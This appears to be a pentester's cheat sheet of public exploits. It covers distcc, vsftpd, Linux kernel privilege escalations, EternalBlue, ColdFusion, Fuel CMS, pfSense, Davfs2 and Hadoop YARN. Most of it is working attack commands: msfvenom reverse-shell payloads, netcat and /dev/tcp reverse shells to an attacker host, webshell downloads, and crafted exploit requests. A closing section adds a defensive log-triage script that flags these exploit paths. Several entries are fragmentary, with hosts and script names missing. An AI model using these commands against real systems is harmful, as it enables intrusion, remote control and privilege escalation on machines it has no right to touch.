Public Exploits

distccd v1

nmap --script distcc-cve2004-2687 -p 3632
nmap -p 3632 --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd='nc -nv 4444 -e /bin/bash'"
python -t -p 3632 -c whoami
[OK] Connected to remote service
--- BEGIN BUFFER ---
--- END BUFFER ---
[OK] Done.

VSFTPD v2.3.4

nmap --script ftp-vsftpd-backdoor -p 21
#Manual Exploitation
telnet IP 21
USER user:)
PASS pass

# Check if Port 6200 has opened.

Kernel Exploits

Linux 2.6.32 < 3.x (CentOS - x86)

cp /usr/share/exploitdb/exploits/linux_x86/local/9542.c
gcc -m32 -Wl,--hash-style=both 9542.c -o 9542

Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04)

  • Requires:

    • PID of udevd

    • Create /tmp/run; the exploit executes that file.

      cat /proc/net/netlink
      sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
      dcc4be00 15  2687   00000001 0        0        00000000 2
      ddf0dc00 15  0      00000000 0        0        00000000 2

Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation

#Tested on x86 - Linux 3.0.0-12-generic
gcc mempodipper.c -o espriv

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW'

gcc -pthread dirty.c -o dirty -lcrypt

#Or ./dirty my-new-password
su firefart

#Or ssh firefart@...


gcc Exploit.c -o Exploit -lcrypto

./Exploit 0x6b 443 -c 50

Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27)


  • Compile on local machine and run on target in case target does not have gcc.

Elastix 2.2


MS17-010 [EternalBlue]



git clone
pip install -r requirements.txt

#Identify valid named pipes
python <Target>

#Opens an SMB interactive shell. This may not always work.
python <Target>

#Generate a Payload
cd shellcode
sudo ./

#Both x64 and x86 payloads are generated; select based on the target arch.
python <Target> /shellcode/sc_all.bin


  1. Download since the exploit imports it. The download location is included in the exploit.

  2. Use MSFvenom to create a reverse shell payload.

  3. Make changes in the exploit to add the authentication credentials and the reverse shell payload. [Guest :: <Blank password>]

Generate Payload

msfvenom -p windows/shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe

Exploit Modification

  • Modify these two lines for smb_send_file and service_exec.

    • Uncomment the lines

    • Add the exploit file to send

    • Payload to execute from the client side.

  • Add Authentication Credentials

    • 'guest' for anonymous login

    • If the above does not work, check with USERNAME = ' '

#Set up listener

git clone
pip install -r requirements.txt
#Identify valid named pipes
python <Target>

python <named pipe>



Create Shellcode

  • -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" - The bad characters not to use. I got this from the comments in the python code.

  • -f py - Output in python format. The examples use c format and just paste it in slightly differently. Either will work.

  • -v shellcode - Have the code set the variable shellcode, instead of the default, buf. I want this to match what it’s called in the code I’m using.

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows

Take this shellcode into the script, and paste it in replacing the default.

The exploit requires that I know the version of Windows and the Language pack:

Example: 1 445 -- for Windows XP SP0/SP1 Universal, port 445
Example: 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
Example: 3 445 -- for Windows 2003 SP0 Universal
Example: 4 445 -- for Windows 2003 SP1 English
Example: 5 445 -- for Windows XP SP3 French (NX)
Example: 6 445 -- for Windows XP SP3 English (NX)
Example: 7 445 -- for Windows XP SP3 English (AlwaysOn NX)
#Set up listener
python 6 445

ColdFusion 8


  • Grab the hash and crack it.

RCE through Scheduled Task:

  • Login -> Debugging&Logging -> Scheduled Tasks.

  • Scheduled task setup gives you the ability to download a file from a webserver and save the output locally.

  • Default Location Mapping from: > ColdFusion Mappings

  • Create a reverse shell and host it on our server.

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=443 -f raw > shell.jsp
python -m SimpleHTTPServer 80

  • Set the below task config:

    • Task Name: Shell

    • URL: Webserver hosting the JSP shell

    • Check the box for Save output to a file

    • File: C:\ColdFusion8\wwwroot\CFIDE\shell.jsp

  • After submitting we run the task on demand under Actions.

  • Set up a listener and browse to

| --- CVE-2009-2265 --- |

- RCE through File Upload:

./ <target ip> <target port> </path/to/payload.jsp>

- Manual Exploitation

POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/exp.cfm%00 HTTP/1.0
Content-Length: 287
Content-Type: multipart/form-data; boundary=o0oOo0o
Connection: close

Content-Disposition: form-data; name="NewFile"; filename="exploit.txt"
Content-Type: text/plain

 %Exploit code%

| --- CVE-2018-15961 --- |

Metasploit Module:

#Access uploaded file at <URL>/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell

POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
Content-Length: 1832
Connection: close
Upgrade-Insecure-Requests: 1

Content-Disposition: form-data; name="file"; filename="shell"
Content-Type: text/plain

<Exploit-code in JSP>

Content-Disposition: form-data; name="path"


File Disclosure [LFI]

  • http://<url>/unauthenticated/..%01 (the ..%01 sequence repeated 40 times)


Fuel CMS 1.4 RCE

Fuel CMS 1.4 is affected by a code evaluation + SQL injection vulnerability in the filter parameter of /fuel/pages/select that can be chained for RCE.

  • Use Burp to intercept the request, as the payload output is returned in the page source.


https://<TARGET-IP>/fuel/pages/select?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27<insert code here >%27%29%2b%27

For Example, within Burp: /fuel/pages/select?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27whoami;cat /etc/passwd%27%29%2b%27

To get a Reverse shell:

  • wget http://<attackers-IP>/webshell.php -O shell.php

  • Set up a listener and access http://<target-IP>/shell.php

DotNetNuke [DNN]

Nibbleblog 4.0.3



  • Login to nibbleblog: http://<IP>/nibbleblog/admin.php?controller=plugins

  • Upload PHP reverse shell: http://<IP>/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image

    • Ignore errors

  • Access webshell at default location:



  • The vulnerability arises because the '|' character is not filtered in the database parameter.

  • Target URL: <URL>/status_rrd_graph_img.php?database=queues;printf+'<payload>'|sh (the string the exploit assembles by concatenation)


  • Admin credentials [Default admin :: pfsense]


  • Python payload -> converted to octal -> a few characters removed to avoid errors -> saved to a temp file on the target -> executed by the target server in PHP [printf]

python --rhost --lhost --lport 4445 --username rohit --password pfsense

Davfs2 1.4.6 Local Priv Esc

#Find file storing Basic Auth credentials
head /etc/apache2/sites-enabled/000-default

#Set new credentials [based on the current encryption, use htpasswd / htdigest]
htdigest /<Location of Basic Auth credentials file> webdav newuser
#<Enter Password for newuser>

wget --no-check-certificate -O 28806.temp.txt
tr -d '\r' < 28806.temp.txt > 28806.txt
sed -n '40,73p' 28806.txt > coda.c
sed -n '84,90p' 28806.txt > Makefile
sed -n '101,192p' 28806.txt >
echo '#!/usr/bin/env bash' > /home/dave/rootprog
echo 'bash -i >& /dev/tcp/<Attacker IP>/1234 0>&1' >> /home/dave/rootprog
chmod +x /home/dave/rootprog
chmod +x
echo 'kernel_fs       coda' >> .davfs2/davfs2.conf

#Set up listener on attacker host
nc -nlvp 1234

#Execute exploit on target
mount /mnt/dav/
#Enter credentials for newuser when prompted.

Hadoop Yarn RCE

#Check if API endpoint is available
curl -v -X POST 'http://ip:8088/ws/v1/cluster/apps/new-application'

#Expected response
{"application-id": "application_1527144634877_20465",
 "maximum-resource-capability": {"memory": 16384, "vCores": 8}}

#Create a task(test.json) and submit via curl
curl -s -i -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' \
  'http://ip:8088/ws/v1/cluster/apps' --data-binary @test.json
  • Contents of test.json

Apache NiFi RCE

python <Target IP> <Command>
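A defender-side companion to the web-application entries above (the ColdFusion CVE-2009-2265 and CVE-2018-15961 upload paths, the Fuel CMS filter payload, the pfSense status_rrd_graph_img.php injection and the unauthenticated YARN REST submission): an added Python triage script, not from these notes or from any tool they reference, that decodes web-server access-log requests and labels the ones hitting those paths and parameters. The log lines, hosts and label names are constructed here.

```python
import re
from urllib.parse import urlsplit, unquote_plus
# Constructed sample lines (combined log format): request targets mirror the
# paths quoted in the notes above; hosts, timestamps and sizes are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /fuel/pages/select?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27id%27%29%2b%27 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/exp.cfm%00 HTTP/1.0" 200 287
10.0.0.6 - - [01/Jan/2024:10:00:03 +0000] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1" 200 91
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /status_rrd_graph_img.php?database=queues;printf+'%5c101'|sh HTTP/1.1" 200 0
10.0.0.8 - - [01/Jan/2024:10:00:05 +0000] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 200 128
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /fuel/pages/select?filter=news HTTP/1.1" 200 2048
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d{3}')

def parse_query(query):
    # Hand-rolled so ';' stays inside a value (older parse_qs split on it).
    pairs = (p.partition("=") for p in query.split("&"))
    return {unquote_plus(k): unquote_plus(v) for k, _, v in pairs}

def classify(method, path, query):
    """Return a finding label for one request, or None when nothing matches."""
    q, lp = parse_query(query), path.lower()
    if lp.endswith("/fckeditor/editor/filemanager/connectors/cfm/upload.cfm"):
        # CVE-2009-2265: a NUL in CurrentFolder truncates the stored filename
        nul = "\x00" in q.get("CurrentFolder", "")
        return "coldfusion-fckeditor-upload" + ("-nullbyte" if nul else "")
    if lp.endswith("/ckeditor/plugins/filemanager/upload.cfm"):
        return "coldfusion-ckeditor-upload"  # CVE-2018-15961 upload path
    if lp.endswith("/fuel/pages/select"):
        # decoded filter from the notes reads '+pi(print($a='system'))+$a(..)+'
        if re.search(r"\b(system|pi|print)\s*\(", q.get("filter", "")):
            return "fuelcms-filter-code-eval"
    if lp.endswith("/status_rrd_graph_img.php"):
        if re.search(r"[;|`$]", q.get("database", "")):  # shell metacharacters
            return "pfsense-rrd-database-injection"
    if method == "POST" and lp.startswith("/ws/v1/cluster/apps"):
        return "yarn-rest-app-submission"  # also legitimate: check source/auth
    return None

def triage(log_text):
    """Parse combined-format lines; return (src_ip, method, path, label) hits."""
    hits = []
    for m in filter(None, map(LINE_RE.match, log_text.splitlines())):
        src, method, target = m.groups()
        parts = urlsplit(target)
        label = classify(method, parts.path, parts.query)
        if label:
            hits.append((src, method, parts.path, label))
    return hits
```

The YARN rule also fires on normal job submissions, so treat it as a prompt to check the source address and whether the ResourceManager REST API is reachable without authentication, not as a verdict.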
